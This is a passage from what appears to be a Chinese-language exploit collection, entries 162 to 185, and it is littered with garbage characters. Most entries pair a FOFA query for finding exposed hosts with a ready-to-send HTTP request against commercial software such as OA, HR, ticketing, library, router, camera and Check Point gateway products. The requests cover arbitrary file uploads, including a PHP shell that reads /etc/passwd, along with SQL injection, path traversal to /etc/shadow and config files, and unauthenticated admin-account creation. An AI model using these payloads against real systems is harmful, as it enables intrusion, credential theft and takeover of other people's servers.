: x" D; Z" z# p# D3 {& P- W2 d* ?2 R3 v$ U4 ]/ N1 P1 r- g
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传8 u4 S" a# i5 c+ ]+ _7 I
FOFA: app="和丰山海-数字标牌"
6 ^3 `6 f. h0 ]4 A* F. mPOST /QH.aspx HTTP/1.16 ` i4 N, s+ a# S* a# X' k/ @
Host: x.x.x.x
9 B3 m F7 ^) M' D; p. yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0$ P6 k) w* ~1 B2 m: Q$ R
Connection: close
- G! n4 S2 N# I2 ]! wContent-Length: 583
; J" L$ B" {2 t- b, a' _. P% `0 d& zContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey; c2 f+ a1 E, ]
Accept-Encoding: gzip u9 @/ F' [; A' B" K ^
& X- U' r. V# G/ f* D% A
------WebKitFormBoundaryeegvclmyurlotuey
$ T7 W/ S$ v6 L: R- g3 Z3 E. q, gContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"2 i" a, K! O9 D3 j" `' u
Content-Type: application/octet-stream; u, @. w1 S2 ~/ A. h
0 G+ L/ C7 v; N( r% O
<% response.write("ujidwqfuuqjalgkvrpqy") %>6 A4 F$ z5 a* E4 j0 d5 K, \5 z7 T
------WebKitFormBoundaryeegvclmyurlotuey( P0 K# N- ?- R2 u, t7 x3 @
Content-Disposition: form-data; name="action"
, Z- j N; ]8 C# H& z
6 k5 [( M# y o5 U2 \4 @4 b2 N( bupload
y' u1 N, A8 U$ j------WebKitFormBoundaryeegvclmyurlotuey. P M9 W6 i2 }$ w& ^
Content-Disposition: form-data; name="responderId"
2 n" n4 w# w0 a" s9 w7 A$ h6 E) |- m/ A& N4 z. v' ]1 {5 J3 k* e
ResourceNewResponder
. b9 h7 i/ u- V5 g1 ^5 r6 O' p6 q------WebKitFormBoundaryeegvclmyurlotuey9 Y9 B1 E$ Z* R) k, n
Content-Disposition: form-data; name="remotePath"
+ F" `. D/ g3 I O
3 r/ `8 j, k s! c/opt/resources
8 V8 B1 b5 ]$ X6 v' I% c& q& q------WebKitFormBoundaryeegvclmyurlotuey--
6 c7 r$ D v) _3 t
6 W7 q/ k; D4 n1 Y. `! E: A; g$ y
6 K4 _7 ]5 i9 c" whttp://x.x.x.x/opt/resources/kjuhitjgk.aspx" R( v/ O5 r* b: l( P: I
3 P0 f8 I$ I+ H7 }163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
3 ]" \ J- G9 c. o- \FOFA: icon_hash="-795291075"* a. W3 B5 Q1 ?7 m' `1 r
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
& s2 d" p- ~5 m) P% t3 a4 R7 VHost: x.x.x.x
, X7 } G( c& Q2 @! t, y2 PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
8 G! n) }+ r) _! \Connection: close6 j. |- ~5 P/ s; e! q
Content-Length: 293
5 w* k2 A7 j1 f. |* U9 \Accept: */*9 Q& F4 c" s; }% s3 w
Accept-Encoding: gzip, deflate
2 s0 b1 u9 n" W5 q" E; E. AAccept-Language: zh-CN,zh;q=0.9
) }5 _% r. X- D2 [1 b+ J+ iContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod2 O# z, w+ s+ U$ f& B9 R9 T0 x3 L
0 B+ S( i% P+ j! m------iiqvnofupvhdyrcoqyuujyetjvqgocod% E. w9 ^ i7 r
Content-Disposition: form-data; name="name"1 t1 O" X% S. C9 R3 A) }, K
% ^ @& S4 g- e7 v; f7 ~1.php
8 z5 f3 Q+ C5 U: ]- c( ?" d& p------iiqvnofupvhdyrcoqyuujyetjvqgocod. M* p. r. ^8 g- K/ Q4 H" O' H
Content-Disposition: form-data; name="upfile"; filename="1.php"
, Z+ t3 e$ b9 |+ `Content-Type: image/jpeg% C5 F) o3 J5 j. B. W+ y: U
4 H) g! W9 V& c: A. ^
rvjhvbhwwuooyiioxega7 V5 b6 j7 F2 T! w, d
------iiqvnofupvhdyrcoqyuujyetjvqgocod--% I4 c) g; t) M- a1 X$ R% ]( H
* v& |: Q2 L7 I+ F0 }$ b- E9 I# G4 @9 j) G# m) K6 |
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传1 G) M; d- T4 e
FOFA: title="智慧综合管理平台登入" {# k. f$ ], {4 A v# m
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
& ?. G& C5 W% V1 |. G: a/ x3 VHost: x.x.x.x
5 s# |+ b+ V6 m& QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
) a/ H. V) Y5 I* J$ |6 |/ R0 aContent-Length: 288" p" c2 `1 ^; P
Accept: application/json, text/javascript, */*; q=0.01
2 f" D) k4 A* n! [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
, b0 }6 g/ S/ H& yConnection: close0 p% a) [- t0 `9 a$ }/ e
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl7 }7 P' l( `6 F; O* p
X-Requested-With: XMLHttpRequest; X6 e3 z, [4 A& L* E
Accept-Encoding: gzip) g6 y$ a) n P6 c% \. Z# y7 M
4 g" S8 C. s+ {, |7 E9 o------dqdaieopnozbkapjacdbdthlvtlyl
6 |! S3 u0 ?) kContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx", m7 S2 h2 O& B0 ~3 Y0 w% k' F- y
Content-Type: image/jpeg
& @+ d- L, L/ G! n# d: N2 H0 v( v; t; e( w: Z* s% g9 Q
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
; z% p6 h: N# R# j/ f7 }------dqdaieopnozbkapjacdbdthlvtlyl--3 ]& I6 Q2 t$ }8 A' F( i' x
# \% A- K C8 O1 `! f
0 i/ V4 H! ~9 f$ S7 v- Jhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx1 Y+ v; q* i+ g" U I3 C& a5 p; d
8 f3 x. u8 ]2 V+ Q2 X# s& Q# ~4 s165. OrangeHRM 3.3.3 SQL 注入4 J, \! a* _$ ], B& e) O: i
CVE-2024-364282 O7 y6 \) f/ x0 K/ e
FOFA: app="OrangeHRM-产品"
C$ d( w. J. t. [ D6 }6 ^URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))4 f: t6 ?0 N+ E" t- J j9 z
$ Y/ Q0 n. ^3 s' v) e- f! ?. W1 y$ ?0 q0 t$ V+ C- u# q- m
166. 中成科信票务管理平台SeatMapHandler SQL注入
: _0 C1 K/ z- R+ _" |5 TFOFA:body="技术支持:北京中成科信科技发展有限公司"' D- w5 h; B6 j8 W2 Q) R% l' D
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
+ W* K5 _* z: T+ i1 }' H( BHost:
* T0 K5 q8 D( u: b* ?9 f! NPragma: no-cache- A, e5 }8 x) Q5 J% }' b6 @/ G
Cache-Control: no-cache
' e% b1 P' X: X& x1 j* Z E5 y* EUpgrade-Insecure-Requests: 1
$ k s* x. t7 t& `3 m& h( CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
: \# i8 h. g6 C! Q3 \8 YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ b) F j5 [+ Y5 w6 I5 {1 A8 k
Accept-Encoding: gzip, deflate1 ], z `" [; X3 ?# t) P
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
: d; ~9 a. C. G1 |: O: B5 [, CCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE0 o0 P0 T( I5 }6 Y5 u
Connection: close0 ?7 E( h/ R6 f% Q4 R
Content-Type: application/x-www-form-urlencoded, j5 c0 f1 c8 e3 Q" L; T. I* c+ p
Content-Length: 89# _4 K9 ^, E }1 o/ A
6 @% T. @5 p/ i! ` l3 z
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE9 Z0 i a: j( l( O, G9 }
/ L5 o0 X% Q6 a; ^: [7 x' D3 _0 j+ L
167. 精益价值管理系统 DownLoad.aspx任意文件读取
4 [9 ]! Y; W9 r* ^ O/ NFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx", U2 T8 d$ c1 b1 O3 U! h9 v
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1- a- v& \; v- C
Host:
# `( A( D3 o# Q" @3 d) hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. c; y8 D' E; E. }9 [1 X) d0 ^Content-Type: application/x-www-form-urlencoded
) O; N* ]3 ^& zAccept-Encoding: gzip, deflate5 J9 |. Q/ M& _$ X
Accept: */*- B5 o& E% A1 @" f
Connection: keep-alive
4 t1 a. B& }8 K4 H0 D% u; Y P2 F% [9 v! w
& ^- E1 I+ t. R0 ]5 K" e* a3 y
168. 宏景EHR OutputCode 任意文件读取
* G4 f6 U, W1 J8 y |( Z5 x# KFOFA:app="HJSOFT-HCM"7 S5 l( N4 ^, v! R
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
7 ^+ W9 c1 @( u ~. T) c3 xHost: your-ip) P& m: k: b, `& J6 E, M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.363 Z& z" o+ I0 e, y1 t
Content-Type: application/x-www-form-urlencoded! l8 a, W4 K! m* U o3 G+ ?% ]
Connection: close
& l2 N; U n/ a3 I1 h m- `' Y, v. k
) d- P/ D1 G# b3 N: X/ V3 R! J1 \, S- V4 F o5 x
% `! J m0 U6 z0 { A$ g169. 宏景EHR downlawbase SQL注入3 m( V' C* w! b6 m9 s
FOFA:app="HJSOFT-HCM"$ C1 ]+ b. o4 h! i! M1 l; Q" r
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
) ?, z! {; A5 c, k6 P9 P5 ^Host: your-ip
6 w, c9 k/ d! I# j1 h) u4 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 D: D! a5 ]3 v+ \; j7 n
Accept: */*5 {9 \. Z/ ~; R' M
Accept-Encoding: gzip, deflate7 y6 [- A, c' e, m
Connection: close
, f0 e, _8 g5 D* U+ a, [2 R P" t' g) b* ~+ r; m0 y$ Y( V \
! |# F2 j3 V2 W5 I% t( O5 L4 G
1 A: q1 T* T7 j$ U$ }170. 宏景EHR DisplayExcelCustomReport 任意文件读取
! M; A& n! e6 }) } M0 }FOFA:body="/general/sys/hjaxmanage.js"
- [8 w# D% b0 b ]9 q6 OPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1. P$ W) {& _! n; q
Host: balalanengliang
3 L I2 c9 W4 j) RUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ Z3 H8 H9 m' e5 K$ N" SContent-Type: application/x-www-form-urlencoded! w7 ^4 t* k9 v
6 H* R: [9 F7 r1 X/ G+ s
filename=../webapps/ROOT/WEB-INF/web.xml
9 X) |' w, @* P M0 L: b2 f4 V8 @$ S
0 P4 o' D3 e7 ~3 P; \; s171. 通天星CMSV6车载定位监控平台 SQL注入
. x( S# F# m' N; @3 |( d: Y2 s- cFOFA:body="/808gps/"9 K3 D& e6 U$ p) |
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
! V1 B+ i" D% P2 _; h' @Host: your-ip% z5 t9 P g1 c H2 c, @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0: Z5 r; G+ _ b" y' \; R( ]- A
Accept: */*: }) T8 ]7 X; N! y6 C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; z+ \" M/ C$ |( D; }Accept-Encoding: gzip, deflate! o0 k1 }5 a4 K1 z: K T( c4 g/ ]
Connection: close
6 ?; J6 {4 @- w7 h( c' W+ A& g+ {9 \) {7 ^5 H7 `4 P) O: q
2 O B# W( R' J- H. B/ F3 X2 V s( ?0 T. g' z- f! j# b+ j
172. DT-高清车牌识别摄像机任意文件读取7 d. E# |7 {6 r8 o
FOFA:app="DT-高清车牌识别摄像机"- k4 {* m$ ?+ ^
GET /../../../../etc/passwd HTTP/1.1
0 H6 A. N% G6 R2 mHost: your-ip
) v" |3 K0 a9 Y' |. v5 X3 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! z, h3 ~4 l8 oAccept-Encoding: gzip, deflate
0 T- T: T* D" `7 Y3 vAccept: */*
4 v' F f) e1 ^0 `& xConnection: keep-alive
5 \2 E! t' b: f6 c& I/ j+ V( _0 V1 q, x) B0 k) ?
2 J9 o9 r3 z6 k/ R U* k- ~7 k1 {1 d
173. Check Point 安全网关任意文件读取4 T( w6 P# n$ h! b- k0 X8 T# @1 ?
CVE-2024-24919% P ]" K; C3 O
FOFA:app="Check_Point-SSL-Network-Extender"
( T5 g9 [/ O% a. m$ nPOST /clients/MyCRL HTTP/1.1
1 y# W$ F1 P* `6 Y% hHost: your-ip
" y" ]/ G* `* ] y9 x+ N7 bContent-Type: application/x-www-form-urlencoded
5 f' f$ |* b1 u; F5 N' `6 ?6 \- a9 P/ c' ~; O; M# w
aCSHELL/../../../../../../../etc/shadow
5 L8 A: j6 j4 ]1 C. c* r7 e5 w3 a2 F" D: S% Q3 Y- U" H
) a7 g+ I, H7 o- T: t9 Q
/ \7 w2 s/ Y7 o& H M' K174. 金和OA C6 FileDownLoad.aspx 任意文件读取
. B7 p4 g5 F5 x- h1 a* eFOFA:app="金和网络-金和OA"+ J+ f* P) l$ F5 F2 a
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
! |, x+ V' a9 n& ZHost: your-ip
/ w' p( Y% L2 h0 |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
4 j/ M ]0 @: Q! kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% H/ ?' ~" H) Y7 V5 m+ c
Accept-Encoding: gzip, deflate, br
1 T3 S& z- t- u) eAccept-Language: zh-CN,zh;q=0.9. i" m6 o* \# A
Connection: close
% J, T( d- k5 T( c7 o8 g1 @7 J7 I1 V' J4 H# `4 M! L, G
9 L1 B3 `2 K# a, d7 n* o) h. i* |1 } ~, x) {
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入- G) Q7 f5 z8 V7 I- m
FOFA:app="金和网络-金和OA"
/ p) q. ~" @2 z. [GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.17 W1 @. U* ]/ P7 \) N+ \2 C3 i' V9 w1 l
Host:8 I- g# Q8 g% t! ^
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
; J' W6 \- T J7 D: J& z0 K; fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ `3 Z7 L* X, Z8 ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; r$ o0 @- \3 T. m+ A" y
Accept-Encoding: gzip, deflate6 H$ d9 z# i0 G8 [( F+ F- N7 L9 }2 b
Connection: close3 Q/ W$ n5 H9 S8 b+ E5 y
Upgrade-Insecure-Requests: 1
# }9 h/ |! b8 r9 w. H$ |, {# b- w; A5 ~" R3 T7 T( T$ _0 N7 A5 M; O
/ i! V3 w: H2 O2 C8 u176. 电信网关配置管理系统 rewrite.php 文件上传
x. y+ C4 {- R! l) g% H+ [FOFA:body="img/login_bg3.png" && body="系统登录"& P; P# O4 R. k4 q
POST /manager/teletext/material/rewrite.php HTTP/1.1+ F% p, ], l3 c7 ^
Host: your-ip0 `8 i5 O* c+ Y2 O6 v! x& u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
4 I# `2 M/ V7 W2 e7 ^$ u( k" a1 e$ w2 cContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT6 K- b( Y3 y: s8 ~% {
Connection: close
1 a7 z" P% {9 C+ L% b8 N, x/ O+ o* c( r0 n1 o
------WebKitFormBoundaryOKldnDPT
( d( Z4 b. b Y1 E7 eContent-Disposition: form-data; name="tmp_name"; filename="test.php"
! N( i6 l7 L& G/ Z" e# MContent-Type: image/png) }" j6 H. x: N- _" h# ]! b
: B' m3 e* l9 R2 O0 j
<?php system("cat /etc/passwd");unlink(__FILE__);?>+ g* t$ [3 [3 E$ f
------WebKitFormBoundaryOKldnDPT5 f* `6 `: k3 u; G6 `% K6 H+ N
Content-Disposition: form-data; name="uploadtime"* H4 Z( G! {' t( V1 L7 D0 p0 S
y9 \+ _* H$ S: r) G M 4 k$ d; u( O8 n }
------WebKitFormBoundaryOKldnDPT--
" p! S( u* J- o0 `5 e4 M8 u7 J" A4 j0 a, e6 g
- \, u2 ]9 F: ?6 B
9 N, m& s4 J! B, h/ w% z177. H3C路由器敏感信息泄露: C' l6 D y# ]4 `
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg! P8 s) f- c5 m
/userLogin.asp/../actionpolicy_status/../M60.cfg
" v' ^* H3 Q6 B% O* r* M* g1 R+ C/userLogin.asp/../actionpolicy_status/../GR8300.cfg" i8 H% z; A# T+ B0 ?5 f) d
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
( e9 a" n% G* G" n( M$ v1 |/userLogin.asp/../actionpolicy_status/../GR3200.cfg
) W3 Z7 S0 w" `4 z. b# r/userLogin.asp/../actionpolicy_status/../GR2200.cfg' V$ A4 ^) | ^- k. m8 i
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
! e# S) t; l- r, k R: q6 h6 o/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
* Y+ Z$ O5 B; s6 T; f/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg# b4 `9 m3 L+ ?. c& U
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg0 t, S; I. h1 r4 k F7 `
/userLogin.asp/../actionpolicy_status/../ER5200.cfg5 Y% U4 o( o3 u3 H
/userLogin.asp/../actionpolicy_status/../ER5100.cfg8 u, x7 b) p5 o4 V% V s
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
8 d5 e! @( d- f. K( h/userLogin.asp/../actionpolicy_status/../ER3260.cfg
$ r3 d9 r& d! {& X) X, X5 R1 K/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
$ I- h! C" `; d# q0 W" Y9 ^6 V/userLogin.asp/../actionpolicy_status/../ER3200.cfg7 d- c: {% p; t$ V9 F+ P
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
, ^; e3 F6 L8 e. w9 h* Z/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
) w& `, Z7 {- a: Q! b- q/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg" Q6 J" ]+ x1 t$ T& E/ h
/userLogin.asp/../actionpolicy_status/../ER3100.cfg0 N$ W! e, Z4 G
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg q) ]4 u2 w8 P. Y# W
4 \ S/ h' u( a+ P- \4 k9 N/ R4 i( u, q7 A" P7 Z# n# c6 L( [: V; L
178. H3C校园网自助服务系统-flexfileupload-任意文件上传' j, V) @0 n* b1 I- L
FOFA:header="/selfservice") @' t. R$ z& {7 o2 G
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1 D& }( b, a6 f+ d+ t/ B
Host: h3 q1 B/ [) g( E( \+ B' w% j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
! m3 n A7 L4 S' OContent-Length: 252
. K _: L& N. {2 l) F& q! o) j% K7 KAccept-Encoding: gzip, deflate
& u" n: m& u& K" c% y( WConnection: close
' f9 ?) G! O8 BContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l2 \3 O9 {) h6 K
-----------------aqutkea7vvanpqy3rh2l
' Z# g) w- T5 zContent-Disposition: form-data; name="12234.txt"; filename="12234"* P& y3 D% K- z6 G% V: ?' p
Content-Type: application/octet-stream
7 N- B( o6 e6 ], A/ W# x: [Content-Length: 255
( `# q% Z+ j( o/ a& @( S; v, e8 @2 v. u% B# f5 G) D
12234
; s$ u2 ~. ?( u7 j9 l: o-----------------aqutkea7vvanpqy3rh2l--
& ?7 Y( A% w# j+ @( ?( n% t- e0 `* H$ d( Q2 ]$ S7 Q2 ^6 K+ n9 S
$ @( k7 @5 ` l$ dGET /imc/primepush/%2e%2e/flex/12234.txt
# _' ^- t$ y5 W; D9 E: V0 x- [5 s6 ^+ w$ T( D
& |: `3 l4 n# w5 r$ ^4 |
179. 建文工程管理系统存在任意文件读取7 V: e/ t' W8 C8 I: O8 D4 N; F
POST /Common/DownLoad2.aspx HTTP/1.1
0 s" p; i- [6 Z# K' {0 c& r) PHost: {{Hostname}}
8 c) K# A& _" KContent-Type: application/x-www-form-urlencoded
( N+ `/ O; c. ~* v: KUser-Agent: Mozilla/5.0
+ ]% }+ F1 V; K) A0 \8 {
4 V) V Q9 a- m9 G/ J% Tpath=../log4net.config&Name=. _4 `' e, e/ K% U4 }9 L
+ o" I: ^$ N% h1 O9 y
7 x/ f1 ^1 K& g+ T! r( W, X& T2 ~180. 帮管客 CRM jiliyu SQL注入
4 q& j' Z8 u. }8 dFOFA:app="帮管客-CRM"* h* y4 u. u4 d( z! ~3 U
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
! w E8 M6 J; {8 THost: your-ip
6 D+ D. G2 K9 q- ` E9 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
$ ~6 {9 r p& ^2 u1 c% VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 H4 p: Z0 M, Z, C) ~3 _0 mAccept-Encoding: gzip, deflate
9 S4 p$ Z# {6 Y& k; LAccept-Language: zh-CN,zh;q=0.97 O; a6 O/ J/ G9 ^
Connection: close
/ @2 b2 z4 }7 @5 o+ Z% g6 }' E+ E3 V; V+ s+ H- c6 ?, r. U
' `; F2 V G$ G* W181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
' C; |3 q& y+ M& x4 j# [FOFA:"PDCA/js/_publicCom.js"4 @% X ^$ X0 {& B. A
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.19 W' ]) y9 _( Q( F4 r( _+ w$ L L) V
Host: your-ip
- S. J7 H* m' [+ E- O0 e: j& QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
% D2 q' I0 X8 a; A- OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 L. A/ V+ l6 y( D+ N# E1 wAccept-Encoding: gzip, deflate, br
/ y7 a/ \& E+ Q$ s! Q1 I8 g7 H$ KAccept-Language: zh-CN,zh;q=0.9
2 W. z4 P1 x- y% z) s0 D! aConnection: close# c1 B; i6 F% a
Content-Type: application/x-www-form-urlencoded I& p2 j- g4 R; w' o4 G$ A
' _) ^' h( {: \7 H& v
4 m7 j" ~6 L- C2 paction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
& p. k) @4 v# L5 T: M9 r
6 _! n" f/ D! D: T
. O, n/ p, B9 }& t1 _182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建$ i& ?; b& L$ Z& |
FOFA:"PDCA/js/_publicCom.js"& z; X+ }6 t3 h9 I1 C
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.16 Z5 K8 Z7 R6 ^& |+ M- t: b9 O& K
Host: your-ip P5 o4 i ^' _# Z, x! j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
5 X% S$ k' M! B4 U& ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' Y- @" j8 N$ l- m& z" ZAccept-Encoding: gzip, deflate, br3 A& Q" G0 \+ D i: q
Accept-Language: zh-CN,zh;q=0.9
% U2 M* s& m. b1 x, ^ rConnection: close9 x" {" E: C: ~; U4 w
Content-Type: application/x-www-form-urlencoded+ V& c( a: b: i8 C
) Y1 w+ c( Z$ j }9 \
0 I: f& Q0 A3 b- ]% lusername=test1234&pwd=test1234&savedays=1 T3 u, m1 _: W2 u1 ]$ |
" Z% z7 g9 q# X9 L
0 o3 e4 |1 G4 V( j. l% {' y+ Z
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入! G. p" Y1 r4 G: k1 b$ _/ ]
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面", F7 i' T6 e) m
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.10 e$ l+ c% f1 b, d3 I
Host: your-ip
' j/ F; ]; b9 d! z# K$ S. K$ N0 gUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36- l* M2 _1 ~, i5 f; s3 u
Accept-Charset: utf-8 \4 i% b/ Y+ p5 I
Accept-Encoding: gzip, deflate& `2 b: g- F1 `$ u
Connection: close
. C# O. C- \$ W$ ^6 _$ r x5 I3 r3 I1 Y$ M3 f
7 I9 N- C' h* S! i184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加$ t( E0 b* P6 _. q
FOFA:server="SunFull-Webs"
" L5 k; ]4 S3 x) lPOST /soap/AddUser HTTP/1.13 C F1 ^- b( P7 _2 H9 |: ~8 R
Host: your-ip3 r1 c! A- @6 u+ E) r: m7 U
Accept-Encoding: gzip, deflate
# a" Q" s8 s( p2 D( m2 O- EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0/ t1 D- }6 u5 h# v8 A
Accept: application/xml, text/xml, */*; q=0.01
( ^5 k2 L: ~9 S- _Content-Type: text/xml; charset=utf-8" Y X- P& C( T5 ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& ?/ C8 [0 x9 z/ Z8 [X-Requested-With: XMLHttpRequest
2 b3 O1 a2 M& |$ Y- _) t' q6 l. L$ w( W( y, M. |: R
" Y% n1 J0 P7 [5 ?: \insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
5 v; R! L/ N. C/ S: i9 [' q( f3 m- N8 p. p N
1 H7 q8 o* q( @: [2 d: Q185. 瑞友天翼应用虚拟化系统SQL注入% A( _% n S2 ]2 t, a& `; N
version < 7.0.5.1
* L) \# S4 H! L& B/ }* r& s: N" jFOFA:app="REALOR-天翼应用虚拟化系统"
